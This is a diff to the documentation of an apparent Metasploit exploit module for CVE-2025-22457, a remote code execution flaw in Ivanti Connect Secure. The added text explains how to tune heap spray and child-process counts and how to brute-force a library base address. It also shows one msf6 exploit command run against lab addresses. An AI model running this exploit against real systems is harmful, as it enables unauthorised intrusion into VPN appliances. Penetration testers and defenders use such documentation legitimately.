@@ -41,6 +41,18 @@ The number of `/home/bin/web` child processes the server uses. It's been
41
41
observed that the number of children the main process forks is directly related
42
42
to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so
43
43
the default number of children is set to 4.
44
+ Note that this option should be set properly, since the exploit needs to send enough
45
+ spray patterns to fill the memory of each child process. This is mandatory,
46
+ since we don’t control which child process will be used to trigger the
47
+ vulnerability. If we send too much data, the process memory will overflow and
48
+ the process will crash. A ` Broken pipe ` socket error will happen in this case.
49
+ So, if the number of ` WEB_CHILDREN ` is too low (< vCPUs), we might not send
50
+ enough data to fill the memory of every child process and the exploit would
51
+ likely fail. This scenario cannot be detected since the child processes should
52
+ not crash. The module will simply continue to brute force with a different base
53
+ address of ` libdsplibs ` , without detecting the real issue. On the other hand,
54
+ if we send too much data, the child processes will crash and we will need to
55
+ start everything again with a lower ` WEB_CHILDREN ` value.
44
56
45
57
### LIBDSPLIBS_ADDRESS
46
58
The base address of libdsplibs that the module will start with when brute
@@ -57,7 +69,7 @@ The number of attempts to brute force the base address of libdsplibs (default: 2
57
69
58
70
### Ivanti Connect Secure version 22.7r2.4 b3597
59
71
60
- In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPU's .
72
+ In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPUs .
61
73
62
74
```
63
75
msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2
0 commit comments